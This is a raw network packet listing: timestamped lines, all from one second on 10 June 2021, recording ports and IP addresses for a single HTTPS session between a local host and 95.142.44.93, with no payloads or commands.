Jun 10, 2021 19:29:43.672497988 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.672511101 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.672522068 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.672554016 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.672568083 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.672604084 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.672606945 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.672646999 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.672655106 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.672684908 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.672698021 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.672725916 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.672734022 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.672765017 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.672780991 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.672804117 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.672816992 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.672842979 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.672852039 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.672879934 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.672894001 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.672926903 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.672930956 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.672972918 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.672985077 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.673012018 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.673027992 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.673051119 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.673064947 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.673100948 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.751229048 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.751271009 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.751307011 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.751346111 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.751380920 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.751396894 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.751418114 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.751431942 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.751437902 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.751441956 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.751446009 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.751455069 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.751470089 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.751499891 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.751517057 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.751539946 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.751554012 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.751576900 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.751591921 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.751615047 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.751627922 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.751653910 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.751676083 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.751689911 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.751718998 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.751728058 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.751732111 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.751765013 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.751784086 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.751808882 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.751816034 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.751848936 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.751862049 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.751885891 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.751912117 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.751929998 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.751950026 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.751956940 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.751975060 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.751983881 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.752003908 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.752013922 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.752039909 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.752042055 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.752073050 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.752075911 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.752089977 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.752110958 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.752131939 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.752140045 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.752156019 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.752167940 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.752196074 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.752196074 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.752207994 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.752223969 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.752250910 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.752259016 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.752274036 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.752278090 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.752295971 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.752309084 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.752326965 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.752338886 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.752367020 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.752372026 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.752382040 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.752393961 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.752420902 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.752425909 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.752440929 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.752449036 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.752468109 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.752475977 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.752487898 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.752504110 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.752527952 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.752537012 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.752545118 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.752588987 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.831162930 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.831206083 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.831237078 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.831265926 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.831296921 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.831329107 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.831343889 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.831367016 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.831381083 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.831387043 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.831391096 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.831396103 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.831399918 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.831402063 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.831417084 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.831434011 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.831463099 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.831465960 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.831485033 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.831497908 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.831523895 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.831528902 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.831547976 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.831562042 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.831573963 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.831593990 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.831617117 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.831630945 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.831650019 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.831665993 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.831686974 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.831696987 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.831720114 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.831729889 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.831747055 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.831760883 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.831784964 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.831789970 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.831808090 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.831824064 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.831830978 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.831855059 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.831872940 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.831892967 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.831907988 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.831929922 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.831953049 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.831959963 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.831984043 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.831990957 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.832006931 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.832024097 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.832043886 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.832052946 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.832079887 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.832083941 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.832107067 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.832115889 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.832130909 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.832154989 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.832170963 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.832189083 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.832212925 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.832220078 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.832237005 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.832252979 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.832268953 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.832299948 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.832309008 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.832328081 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.832350969 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.832356930 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.832374096 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.832376957 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.832395077 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.832402945 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.832418919 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.832428932 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.832459927 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.832467079 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.832483053 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.832483053 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.832499981 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.832508087 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.832530022 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.832541943 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.832551956 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.832554102 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.832571983 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.832576036 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.832597017 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.832604885 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.832616091 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.832633018 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.832654953 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.832659960 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.832672119 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.832679033 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.832701921 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.832721949 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.832726002 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.832732916 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.832740068 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.832751036 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.832772970 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.832772970 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.832798004 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.832801104 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.832814932 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.832827091 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.832849979 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.832861900 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.832873106 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.832878113 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.832891941 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.832896948 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.832916975 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.832920074 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.832943916 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.832952976 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.832966089 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.832968950 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.832997084 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.832998037 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.833014011 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.833023071 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.833045959 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.833050966 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.833069086 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.833076954 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.833092928 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.833095074 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.833116055 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.833125114 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.833134890 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.833142042 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.833165884 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.833170891 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.833192110 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.833194017 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.833203077 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.833220959 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.833244085 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.833250999 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.833266020 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.833267927 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.833283901 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.833296061 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.833309889 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.833323002 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.833347082 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.833352089 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.833368063 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.833369970 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.833400011 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.833403111 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.833414078 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.833425045 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.833455086 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.833471060 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.911602020 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.911650896 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.911689043 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.911736012 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.911778927 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.911817074 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.911830902 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.911856890 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.911866903 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.911902905 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.911940098 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.911978960 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.912017107 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.912054062 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.912065029 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.912070036 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.912107944 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.912112951 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.912147999 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.912178040 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.912189007 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.912228107 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.912250042 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.912266016 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.912305117 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.912331104 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.912344933 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.912395000 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.912401915 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.912437916 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.912456989 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.912477016 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.912493944 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.912511110 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.912549973 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.912550926 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.912564039 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.912587881 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.912600994 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.912627935 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.912642956 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.912666082 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.912682056 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.912715912 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.912719965 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.912767887 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.912770033 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.912806988 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.912842035 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.912861109 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.912869930 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.912897110 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.912931919 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.912956953 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.912967920 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.912983894 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.912987947 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.913003922 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.913031101 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.913054943 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.913067102 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.913080931 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.913104057 CEST	49724	443	192.168.2.3	95.142.44.93
